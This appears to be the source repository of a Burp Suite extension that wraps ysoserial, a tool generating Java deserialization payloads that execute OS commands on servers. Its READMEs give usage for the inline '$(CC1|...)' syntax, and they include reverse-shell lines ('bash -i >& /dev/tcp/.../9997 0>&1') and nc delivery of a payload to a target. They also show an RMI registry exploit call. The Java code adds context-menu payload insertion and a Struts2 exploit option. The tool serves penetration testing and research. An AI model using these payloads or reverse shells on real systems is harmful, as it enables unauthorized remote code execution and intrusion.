This extension generates various Java serialized payloads designed to execute
2 | OS commands. There are three ways to use the extension:
3 |
4 |
Generate a payload from the Java Serialized Payloads Tab. You can then copy and paste
5 | it into other tabs in Burp.
6 |
Generate a payload from the Java Serialized Payloads Tab. In another tab you can select
7 | the text you want to replace and right click. You have three encoding
8 | options:
9 |
Raw - This will replace your selected text with a raw unencoded
10 | version of the payload.
11 |
B64 - This will replace your selected text with a Base64 encoded
12 | version.
13 |
URLEnc - This will replace your selected text with a URL-encoded and
14 | base64 encoded payload.
15 |
16 |
17 |
You can use inline commands to replace your text with a payload that
18 | contains your command. For example you can enter text in Repeater like:
19 | $(CC1|ping -c1 8.8.8.8)
Select the above text and right click
20 | any of the Java Serialized Payload Options and it will replace your command
21 | with a payload containing that command.
The first parameter before
22 | the pipe in the above statement is the version of the exploit. You can enter
23 | any of the following:
24 |
25 |
CC1 or CollectionCommons1
26 |
CC2 or CollectionCommons2
27 |
GV1 or Groovy1
28 |
SP1 or Spring1
29 |
30 | TThe second parameter is the OS command you wish to run.
31 |
32 |
33 |
--------------------------------------------------------------------------------
/BappManifest.bmf:
--------------------------------------------------------------------------------
1 | Uuid: bc737909a5d742eab91544705c14d34f
2 | ExtensionType: 1
3 | Name: Java Serialized Payloads
4 | RepoName: java-serialized-payloads
5 | ScreenVersion: 0.0.2a
6 | SerialVersion: 2
7 | MinPlatformVersion: 0
8 | ProOnly: False
9 | Author: Josh Summitt
10 | ShortDescription: Generates Java serialized payloads to execute OS commands.
11 | EntryPoint: ysoserial/target/ysoserial-0.0.2-SNAPSHOT-all.jar
12 | BuildCommand: cd ysoserial && mvn package -DskipTests=true -Dmaven.javadoc.skip=true -B
13 | SupportedProducts: Pro, Community
14 |
--------------------------------------------------------------------------------
/Payload Generator.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/Payload Generator.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # burp-ysoserial - with complex command in injection support
2 |
3 | Download the jar file here: [ysoserial.jar](https://github.com/summitt/burp-ysoserial/releases)
4 |
5 | There are 3 ways to run this [Burp](https://portswigger.net/) extension.
6 |
7 | 1. Generate a payload from the Java Serialized Payloads Tab. You can then copy and paste it into other tabs in [Burp](https://portswigger.net/).(Not ideal)
8 | 1. Generate a payload from the Java Serialized Payloads Tab. In another tab you can select the text you want to replace and right click. You have 3 options to replace.
9 | 1. Raw - This will replace your selected text with an unencoded version of the payload. This is raw binary/hex.
10 | 1. B64 - This payload will replace your selected text with a base64 encoded version.
11 | 1. URLEnc - This will replace your selected text with a URL encoded and base64 encoded payload. Ideal for web type applications
12 | 1. You can use inline commands to replace your text with a payload that contains your command. For example you can enter text in repeater like:
13 |
14 | ```$(CC1|ping -c1 8.8.8.8)```
15 |
16 | Select the above text and right click any of the Java Serialized Payload Options and it will replace your command with a payload containing that command.
17 |
18 | The first parameter before the pipe in the above statement is the version of the exploit. You can enter any of the following:
19 | - CC1 or CollectionCommons1
20 | - CC2 or CollectionCommons2
21 | - GV1 or Groovy1
22 | - SP1 or Spring1
23 |
24 | The second parameter is obviously the OS command you wish to run.
25 |
26 | ## Complex Commands (i.e. pipes and I/O redirection)
27 | Note ysoserial in this extension has been updated to accept more complicated commands that in the original. For instance commands like the following command would fail to execute on the victim server in the original ysoserial application.
28 |
29 | ```echo test > /tmp/text.txt```
30 | or
31 | ```bash -c "echo test > /tmp/text.txt"```
32 |
33 | This is because to run complex commands that pipe command into other commands in java the arguments needs to be a string Array. This version of ysoserial has been modified by using a delimter of ",," to seperate your arguments to the string array. Here is an example of running a more complicated command using this method to get a reverse shell:
34 |
35 | ```/bin/bash,,-c,,bash -i >& /dev/tcp/X.X.X.X/9997 0>&1```
36 |
37 | The above code will be split into a string array that java can run on the victim server. :) The resulting java code would look like:
38 | ```Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "bash -i >& /dev/tcp/X.X.X.X/9997 0>&1"});```
39 |
40 | ##Examples
41 | ### Example 1 - Replace selected text with a pre-generated payload
42 | 1. First Generate a payload
43 | 
44 | 2. Go to Repeater and select the text you want to replace.
45 | 3. Right Click and select a payload option.
46 | 
47 |
48 | ### Example 2 - Use and inline command
49 | 1. In [Burp](https://portswigger.net/) Repeater replace your parameter with the following code:
50 |
51 | ```$(CC1|ping -c1 8.8.8.8)```
52 |
53 | 2. Select the above text. Right Click in repeater and select the payload type.
54 | 
55 |
56 | ### Example 3 - Complex commands
57 | 1. In Repeater replace your parameter with the following command:
58 |
59 | ```$(CC1|/bin/bash,,-c,,bash -i >& /dev/tcp/192.168.1.223/9997 0>&1)```
60 |
61 | 2. Select it and select the payload you want to generate.
62 | 
63 |
--------------------------------------------------------------------------------
/complex command.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/complex command.png
--------------------------------------------------------------------------------
/inline complex command.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/inline complex command.png
--------------------------------------------------------------------------------
/inline-command.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/inline-command.png
--------------------------------------------------------------------------------
/replace with generated.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/replace with generated.png
--------------------------------------------------------------------------------
/ysoserial/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/ysoserial/.DS_Store
--------------------------------------------------------------------------------
/ysoserial/.gitignore:
--------------------------------------------------------------------------------
1 | /target
2 | .classpath
3 | .project
4 | .settings/
5 | pwntest
6 | /bin/
7 |
--------------------------------------------------------------------------------
/ysoserial/.travis.yml:
--------------------------------------------------------------------------------
1 | language: java
2 | jdk:
3 | - oraclejdk8
4 | - oraclejdk7
5 | - openjdk7
6 | - openjdk6
--------------------------------------------------------------------------------
/ysoserial/DISCLAIMER.txt:
--------------------------------------------------------------------------------
1 | DISCLAIMER
2 |
3 | This software has been created purely for the purposes of academic research and
4 | for the development of effective defensive techniques, and is not intended to be
5 | used to attack systems except where explicitly authorized. Project maintainers
6 | are not responsible or liable for misuse of the software. Use responsibly.
--------------------------------------------------------------------------------
/ysoserial/LICENSE.txt:
--------------------------------------------------------------------------------
1 | Copyright (c) 2013 Chris Frohoff
2 |
3 | MIT License
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining
6 | a copy of this software and associated documentation files (the
7 | "Software"), to deal in the Software without restriction, including
8 | without limitation the rights to use, copy, modify, merge, publish,
9 | distribute, sublicense, and/or sell copies of the Software, and to
10 | permit persons to whom the Software is furnished to do so, subject to
11 | the following conditions:
12 |
13 | The above copyright notice and this permission notice shall be
14 | included in all copies or substantial portions of the Software.
15 |
16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
19 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
20 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
21 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
22 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--------------------------------------------------------------------------------
/ysoserial/README.md:
--------------------------------------------------------------------------------
1 |
2 | # ysoserial
3 |
4 | A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
5 |
6 | 
7 |
8 | ## Description
9 |
10 | Released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"](http://frohoff.github.io/appseccali-marshalling-pickles/)
11 |
12 | __ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java
13 | libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of objects.
14 | The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
15 | serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
16 | this data, the chain will automatically be invoked and cause the command to be executed on the application host.
17 |
18 | It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
19 | gadgets on the classpath.
20 |
21 | ## Disclaimer
22 |
23 | This software has been created purely for the purposes of academic research and
24 | for the development of effective defensive techniques, and is not intended to be
25 | used to attack systems except where explicitly authorized. Project maintainers
26 | are not responsible or liable for misuse of the software. Use responsibly.
27 |
28 | ## Usage
29 |
30 | ```shell
31 | $ java -jar ysoserial-0.0.1-all.jar
32 | Y SO SERIAL?
33 | Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
34 | Available payload types:
35 | CommonsCollections1
36 | CommonsCollections2
37 | Groovy1
38 | Spring1
39 | ```
40 |
41 | ## Examples
42 |
43 | ```shell
44 | $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd
45 | 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
46 | 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
47 | 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
48 | ...
49 | 0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
50 | 0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
51 | 0000570: 0078 7071 007e 003a .xpq.~.:
52 |
53 | $ java -jar ysoserial-0.0.1-all.jar Groovy1 calc.exe > groovypayload.bin
54 | $ nc 10.10.10.10 < groovypayload.bin
55 |
56 | $ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
57 | ```
58 |
59 | ## Installation
60 |
61 | 1. Download the latest jar from the "releases" section.
62 |
63 | ## Code Status
64 |
65 | [](https://travis-ci.org/frohoff/ysoserial)
66 |
67 | ## Contributing
68 |
69 | 1. Fork it
70 | 2. Create your feature branch (`git checkout -b my-new-feature`)
71 | 3. Commit your changes (`git commit -am 'Add some feature'`)
72 | 4. Push to the branch (`git push origin my-new-feature`)
73 | 5. Create new Pull Request
74 |
--------------------------------------------------------------------------------
/ysoserial/pom.xml:
--------------------------------------------------------------------------------
1 |
3 | 4.0.0
4 |
5 | ysoserial
6 | ysoserial
7 | 0.0.2-SNAPSHOT
8 | jar
9 |
10 | ysoserial
11 | http://maven.apache.org
12 |
13 |
14 | UTF-8
15 |
16 |
17 |
18 | src
19 |
20 |
21 |
22 | org.apache.maven.plugins
23 | maven-compiler-plugin
24 | 3.2
25 |
26 | 1.8
27 | 1.8
28 |
29 |
30 |
31 | maven-assembly-plugin
32 |
33 | ${project.artifactId}-${project.version}-all
34 | false
35 |
36 |
37 | ysoserial.GeneratePayload
38 |
39 |
40 |
41 | jar-with-dependencies
42 |
43 |
44 |
45 |
46 | make-assembly
47 | package
48 |
49 | single
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 | junit
63 | junit
64 | 4.12
65 | test
66 |
67 |
68 | org.mockito
69 | mockito-core
70 | 1.10.19
71 | test
72 |
73 |
74 | com.github.stefanbirkner
75 | system-rules
76 | 1.8.0
77 | test
78 |
79 |
80 |
81 |
82 |
83 | org.reflections
84 | reflections
85 | 0.9.9
86 |
87 |
88 | org.jboss.shrinkwrap.resolver
89 | shrinkwrap-resolver-depchain
90 | 2.1.1
91 | pom
92 |
93 |
94 | org.javassist
95 | javassist
96 | 3.19.0-GA
97 |
98 |
99 | net.portswigger.burp.extender
100 | burp-extender-api
101 | 1.7.13
102 |
103 |
104 |
105 |
106 |
107 | commons-collections
108 | commons-collections
109 | 3.1
110 |
111 |
112 | org.apache.commons
113 | commons-collections4
114 | 4.0
115 |
116 |
117 | org.apache.commons
118 | commons-lang3
119 | 3.1
120 |
121 |
122 | org.codehaus.groovy
123 | groovy
124 | 2.3.9
125 |
126 |
127 | org.springframework
128 | spring-core
129 | 4.1.4.RELEASE
130 |
131 |
132 | org.springframework
133 | spring-beans
134 | 4.1.4.RELEASE
135 |
136 |
137 |
138 |
--------------------------------------------------------------------------------
/ysoserial/src/burp/BurpExtender.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import java.awt.Component;
4 | import java.awt.event.ActionEvent;
5 | import java.awt.event.ActionListener;
6 | import java.awt.event.InputEvent;
7 | import java.awt.event.MouseEvent;
8 | import java.awt.event.MouseListener;
9 | import java.io.File;
10 | import java.util.ArrayList;
11 | import java.util.List;
12 |
13 | import javax.swing.JMenuItem;
14 | import javax.swing.SwingUtilities;
15 |
16 | import com.josh.ActionJackson;
17 | import com.josh.ysoserialFrame;
18 |
19 |
20 | public class BurpExtender implements IBurpExtender, ITab, IContextMenuFactory
21 | {
22 | private ysoserialFrame exFrame;
23 | private IBurpExtenderCallbacks cb;
24 | private IExtensionHelpers helpers;
25 |
26 | public void registerExtenderCallbacks(
27 | IBurpExtenderCallbacks callbacks)
28 | {
29 |
30 | cb = callbacks;
31 | helpers = cb.getHelpers();
32 | cb.setExtensionName("Java Serialized Payloads");
33 | cb.registerContextMenuFactory(this);
34 | SwingUtilities.invokeLater(new Runnable(){
35 |
36 | //@Override
37 | public void run() {
38 | exFrame = new ysoserialFrame();
39 | cb.customizeUiComponent(exFrame);
40 | cb.addSuiteTab(BurpExtender.this);
41 | }
42 |
43 |
44 | });
45 |
46 |
47 | }
48 |
49 | //@Override
50 | public String getTabCaption(){
51 | return "Java Serialized Payloads";
52 | }
53 | //@Override
54 | public Component getUiComponent() {
55 | return exFrame;
56 | }
57 |
58 | public List createMenuItems(IContextMenuInvocation inv) {
59 | if( inv.getInvocationContext() == inv.CONTEXT_MESSAGE_EDITOR_REQUEST || inv.getInvocationContext() == inv.CONTEXT_MESSAGE_EDITOR_RESPONSE){
60 | JMenuItem raw = new JMenuItem("Java Serialized Payload (Raw)");
61 | raw.addActionListener(new ActionJackson(inv, exFrame, "raw"));
62 | JMenuItem b64 = new JMenuItem("Java Serialized Payload (b64)");
63 | b64.addActionListener(new ActionJackson(inv, exFrame, "b64"));
64 | JMenuItem eurl = new JMenuItem("Java Serialized Payload (URLEnc)");
65 | eurl.addActionListener(new ActionJackson(inv, exFrame, "eurl"));
66 | Liststuff = new ArrayList();
67 | stuff.add(raw);
68 | stuff.add(b64);
69 | stuff.add(eurl);
70 |
71 | return stuff;
72 | }else{
73 | return null;
74 | }
75 | }
76 |
77 | }
78 |
--------------------------------------------------------------------------------
/ysoserial/src/com/josh/ActionJackson.java:
--------------------------------------------------------------------------------
1 | package com.josh;
2 |
3 | import java.awt.event.ActionEvent;
4 | import java.awt.event.ActionListener;
5 | import java.awt.event.InputEvent;
6 | import java.io.UnsupportedEncodingException;
7 | import java.util.Arrays;
8 |
9 | import burp.IContextMenuInvocation;
10 | import burp.IHttpRequestResponse;
11 |
12 | public class ActionJackson implements ActionListener{
13 | private IContextMenuInvocation inv;
14 | private ysoserialFrame ysoframe;
15 | private String opt;
16 | public ActionJackson(IContextMenuInvocation inv, ysoserialFrame ysoframe, String opt){
17 | this.inv = inv;
18 | this.ysoframe = ysoframe;
19 | this.opt = opt;
20 | }
21 |
22 | public void actionPerformed(ActionEvent e) {
23 | try {
24 | updateIfCMD();
25 | replace(ysoframe.getPayloadText(this.opt));
26 | } catch (UnsupportedEncodingException e1) {
27 | // TODO Auto-generated catch block
28 | e1.printStackTrace();
29 | }
30 |
31 | }
32 | private boolean isRequest(){
33 | if(inv.getInvocationContext() == inv.CONTEXT_MESSAGE_EDITOR_REQUEST || inv.getInvocationContext() == inv.CONTEXT_MESSAGE_VIEWER_REQUEST)
34 | return true;
35 | else
36 | return false;
37 |
38 | }
39 | private String getMessage(IHttpRequestResponse o){
40 | return (new String(isRequest()? o.getRequest(): o.getResponse()));
41 | }
42 | private byte[] getMsgBytes(IHttpRequestResponse o){
43 | return isRequest()? o.getRequest(): o.getResponse();
44 | }
45 | private void setMessage(IHttpRequestResponse o, String update){
46 | if(isRequest()){
47 | o.setRequest(update.getBytes());
48 |
49 | }else{
50 | o.setResponse(update.getBytes());
51 | }
52 | }
53 | private void setMsgBytes(IHttpRequestResponse o, byte [] update){
54 | if(isRequest()){
55 | o.setRequest(update);
56 |
57 | }else{
58 | o.setResponse(update);
59 | }
60 | }
61 |
62 |
63 |
64 | /*private void replace-bk(Object replace){
65 | if(replace == null){
66 | return;
67 | }
68 |
69 | System.out.println(replace.getClass().getName());
70 | if(replace.getClass().getName().equals("java.lang.String")){
71 | int start = inv.getSelectionBounds()[0];
72 | int stop = inv.getSelectionBounds()[1];
73 | for(IHttpRequestResponse o : inv.getSelectedMessages()){
74 | String all = getMessage(o);
75 | String Selected = all.substring(start, stop);
76 | if(Selected.startsWith("$(")){
77 | String cmd = Selected.substring(2, Selected.length()-1);
78 |
79 | String type = cmd.substring(0, cmd.indexOf("|"));
80 | String oscmd = cmd.substring(cmd.indexOf("|"));
81 | System.out.println("Running with the following Library: " + type);
82 | System.out.println("Running with the following Command: " + oscmd);
83 | // this will update the other getters and setters used later
84 | this.ysoframe.executeYsoSerial(type, oscmd);
85 | }
86 | String begin = all.substring(0, start);
87 | String end = all.substring(stop);
88 | all = begin + replace + end;
89 | setMessage(o, all);
90 | break;
91 | }
92 | }
93 |
94 |
95 |
96 | }*/
97 | private void updateIfCMD(){
98 | int start = inv.getSelectionBounds()[0];
99 | int stop = inv.getSelectionBounds()[1];
100 | for(IHttpRequestResponse o : inv.getSelectedMessages()){
101 | String all = getMessage(o);
102 | String Selected = all.substring(start, stop);
103 | if(Selected.startsWith("$(")){
104 | String cmd = Selected.substring(2, Selected.length()-1);
105 | String type = cmd.substring(0, cmd.indexOf("|"));
106 | String oscmd = cmd.substring(cmd.indexOf("|")+1);
107 | System.out.println("Running with the following Library: " + type);
108 | System.out.println("Running with the following Command: " + oscmd);
109 | if(type.equals("CC1"))
110 | type = "CommonsCollections1";
111 | else if(type.equals("CC2"))
112 | type = "CommonsCollections2";
113 | else if(type.equals("GV1"))
114 | type = "Groovy1";
115 | else if (type.equals("SP1"))
116 | type = "Spring1";
117 | // this will update the other getters and setters used later
118 | this.ysoframe.executeYsoSerial(type, oscmd);
119 | }
120 | break;
121 | }
122 |
123 | }
124 |
125 | private void replace(Object replace){
126 | if(replace == null)
127 | return;
128 | int start = inv.getSelectionBounds()[0];
129 | int stop = inv.getSelectionBounds()[1];
130 | if(replace.getClass().getName().equals("java.lang.String")){
131 | for(IHttpRequestResponse o : inv.getSelectedMessages()){
132 | String all = getMessage(o);
133 | String Selected = all.substring(start, stop);
134 | String begin = all.substring(0, start);
135 | String end = all.substring(stop);
136 | all = begin + replace + end;
137 | setMessage(o, all);
138 | break;
139 | }
140 | }else{
141 | for(IHttpRequestResponse o : inv.getSelectedMessages()){
142 | byte[] all = getMsgBytes(o);
143 | byte[] begin = Arrays.copyOfRange(all, 0, start);
144 | byte[] end = Arrays.copyOfRange(all, stop, all.length);
145 | byte [] r = (byte[])replace;
146 | byte [] out = new byte[begin.length + end.length + r.length];
147 | System.arraycopy(begin, 0, out, 0, begin.length);
148 | System.arraycopy(r, 0, out, begin.length, r.length);
149 | System.arraycopy(end, 0, out, r.length+begin.length, end.length);
150 | setMsgBytes(o,out);
151 | break;
152 | }
153 |
154 | }
155 |
156 | }
157 |
158 | }
159 |
--------------------------------------------------------------------------------
/ysoserial/src/com/josh/MainMan.java:
--------------------------------------------------------------------------------
1 | package com.josh;
2 |
3 | import java.awt.EventQueue;
4 |
5 | import javax.swing.JFrame;
6 | import javax.swing.UIManager;
7 | import javax.swing.UIManager.LookAndFeelInfo;
8 | import javax.swing.border.EmptyBorder;
9 |
10 |
11 |
12 |
13 |
14 | public class MainMan extends JFrame{
15 | private ysoserialFrame contentPane;
16 |
17 | public static void main(String[] args) {
18 | try {
19 | for (LookAndFeelInfo info : UIManager.getInstalledLookAndFeels()) {
20 | if ("Nimbus".equals(info.getName())) {
21 | UIManager.setLookAndFeel(info.getClassName());
22 | break;
23 | }
24 | }
25 | }
26 | catch (Exception e) {
27 | // DO Nothing
28 | }
29 |
30 |
31 | EventQueue.invokeLater(new Runnable() {
32 | public void run() {
33 | try {
34 | MainMan frame = new MainMan();
35 | frame.setVisible(true);
36 | } catch (Exception e) {
37 | e.printStackTrace();
38 | }
39 | }
40 | });
41 |
42 | }
43 |
44 | public MainMan() {
45 | setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
46 | setBounds(100, 100, 450, 300);
47 | contentPane = new ysoserialFrame();
48 | contentPane.setBorder(new EmptyBorder(5, 5, 5, 5));
49 | //contentPane.setLayout(new BorderLayout(0, 0));
50 | setContentPane(contentPane);
51 | }
52 |
53 |
54 | }
55 |
--------------------------------------------------------------------------------
/ysoserial/src/com/josh/ysoserialFrame.java:
--------------------------------------------------------------------------------
1 | package com.josh;
2 |
3 | import java.awt.BorderLayout;
4 | import java.awt.EventQueue;
5 |
6 | import javax.swing.JFrame;
7 | import javax.swing.JPanel;
8 | import javax.swing.border.EmptyBorder;
9 | import javax.swing.ButtonGroup;
10 | import javax.swing.SpringLayout;
11 | import javax.swing.JSplitPane;
12 | import javax.swing.JRadioButton;
13 | import javax.swing.JTextField;
14 | import javax.swing.JTextPane;
15 | import javax.swing.JLabel;
16 | import javax.swing.JButton;
17 | import javax.swing.SwingConstants;
18 |
19 | import ysoserial.GeneratePayload;
20 | import ysoserial.payloads.ObjectPayload;
21 |
22 | import java.awt.event.ActionListener;
23 | import java.awt.event.ActionEvent;
24 | import java.awt.event.MouseAdapter;
25 | import java.awt.event.MouseEvent;
26 | import java.io.ByteArrayOutputStream;
27 | import java.io.ObjectOutputStream;
28 | import java.io.UnsupportedEncodingException;
29 | import java.net.URLEncoder;
30 | import java.util.Base64;
31 |
32 | import javax.swing.JTextArea;
33 | import javax.swing.JScrollPane;
34 | import javax.swing.ScrollPaneConstants;
35 |
36 | import java.awt.FlowLayout;
37 |
38 | import javax.swing.BoxLayout;
39 |
40 | public class ysoserialFrame extends JPanel {
41 |
42 | private JPanel contentPane;
43 | private JTextField cmdtxt;
44 | private JTextPane outtxt;
45 | private JRadioButton cc1rdo;
46 | private JRadioButton cc2rdo;
47 | private JRadioButton grvrdo;
48 | private JRadioButton spgrdo;
49 | private ButtonGroup group;
50 | private JRadioButton stsrdo;
51 | private JRadioButton insrdo;
52 | private String payloadStr;
53 | private byte[] rawPayload;
54 |
55 | /**
56 | * Launch the application.
57 | */
58 | public static void main(String[] args) {
59 | EventQueue.invokeLater(new Runnable() {
60 | public void run() {
61 | try {
62 | ysoserialFrame frame = new ysoserialFrame();
63 | frame.setVisible(true);
64 | } catch (Exception e) {
65 | e.printStackTrace();
66 | }
67 | }
68 | });
69 | }
70 |
71 | /**
72 | * Create the frame.
73 | */
74 | public ysoserialFrame() {
75 |
76 | contentPane = this;
77 | setLayout(null);
78 |
79 | cmdtxt = new JTextField();
80 | cmdtxt.setBounds(125, 58, 217, 29);
81 | contentPane.add(cmdtxt);
82 | cmdtxt.setColumns(10);
83 |
84 | JLabel lblOsCmd = new JLabel("OS CMD:");
85 | lblOsCmd.setBounds(58, 65, 77, 14);
86 | contentPane.add(lblOsCmd);
87 |
88 | JButton genbtn = new JButton("Generate");
89 | genbtn.addMouseListener(new MouseAdapter() {
90 | @Override
91 | public void mouseClicked(MouseEvent arg0) {
92 | String payloadType = "CommonsCollections1";
93 | if(cc1rdo.isSelected())
94 | payloadType = "CommonsCollections1";
95 | else if(cc2rdo.isSelected())
96 | payloadType = "CommonsCollections2";
97 | else if(grvrdo.isSelected())
98 | payloadType = "Groovy1";
99 | else if(spgrdo.isSelected())
100 | payloadType = "Spring1";
101 | if(insrdo.isSelected()){
102 | outtxt.setText(getInstructions());
103 | }else if(!stsrdo.isSelected())
104 | outtxt.setText(executeYsoSerial(payloadType, cmdtxt.getText().trim()));
105 | else
106 | outtxt.setText(strutsExploit(cmdtxt.getText().trim()));
107 | }
108 | });
109 | genbtn.addActionListener(new ActionListener() {
110 | public void actionPerformed(ActionEvent arg0) {
111 | }
112 | });
113 | genbtn.setBounds(352, 58, 130, 30);
114 | contentPane.add(genbtn);
115 |
116 | JScrollPane scrollPane = new JScrollPane();
117 | scrollPane.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_ALWAYS);
118 | scrollPane.setBounds(33, 98, 662, 481);
119 | add(scrollPane);
120 |
121 | outtxt = new JTextPane();
122 | //outtxt.setLineWrap(true);
123 | outtxt.putClientProperty("html.disable", null);
124 | outtxt.setContentType("text/html");
125 | scrollPane.setViewportView(outtxt);
126 |
127 | JPanel panel = new JPanel();
128 | panel.setBounds(58, 11, 735, 43);
129 | add(panel);
130 | panel.setLayout(new BoxLayout(panel, BoxLayout.X_AXIS));
131 |
132 |
133 | cc1rdo = new JRadioButton("CC1");
134 | panel.add(cc1rdo);
135 | cc1rdo.setSelected(true);
136 | cc1rdo.setToolTipText("CommonsCollections1");
137 |
138 | cc2rdo = new JRadioButton("CC2");
139 | panel.add(cc2rdo);
140 | cc2rdo.setToolTipText("Commons Collections2");
141 |
142 | grvrdo = new JRadioButton("Groovy1");
143 | panel.add(grvrdo);
144 |
145 | spgrdo = new JRadioButton("Spring1");
146 | panel.add(spgrdo);
147 | stsrdo = new JRadioButton("Struts2");
148 | panel.add(stsrdo);
149 | insrdo = new JRadioButton("Instructions");
150 | panel.add(insrdo);
151 | group = new ButtonGroup();
152 | group.add(cc1rdo);
153 | group.add(cc2rdo);
154 | group.add(grvrdo);
155 | group.add(spgrdo);
156 | group.add(stsrdo);
157 | group.add(insrdo);
158 |
159 |
160 |
161 |
162 | }
163 | private String div(String text, String cls){
164 | return "
Generate a payload from the menu above. You can then copy and paste it into other tabs in burp.
"
185 | + "
Generate a payload from the menu above. In another tab you can select the text you want to replace and right click. You have 3 options to replace."
186 | + ""
187 | + "
Raw - This will replace your selected text with an unencoded version of the payload. This is raw binary/hex.
"
188 | + "
B64 - This payload will replace your selected text with a base64 encoded version.
"
189 | + "
URLEnc - This will replace your selected text with a URL encoded and base64 encoded payload. Ideal for web type applications
"
190 | + ""
191 | + "
You can use inline commands to replace your text with a payload that contains your command. For example you can enter text in repeater like: "
192 | + div("$(CC1|ping -c1 8.8.8.8)","code2")
193 | + "Select the above text and right click any of the Java Serialized Payload Options and it will replace your command with a payload containing that command."
194 | + "
"
195 | + "Note ysoserial in this extension has been updated to accept more complicated commands that in the original. "
196 | + "For instance commands the following command would fail to execute on the victim server:"
197 | + div("echo test > /tmp/text.txt","code2") + "or" + div("bash -c \"echo test > /tmp/text.txt\"","code2") +" "
198 | + "This is because to run complex command or pipe command into other commands in java the arguments needs to be a string Array."
199 | + " This has been modified in this version by using a delimter of \",,\". to seperate your arguments to the string array.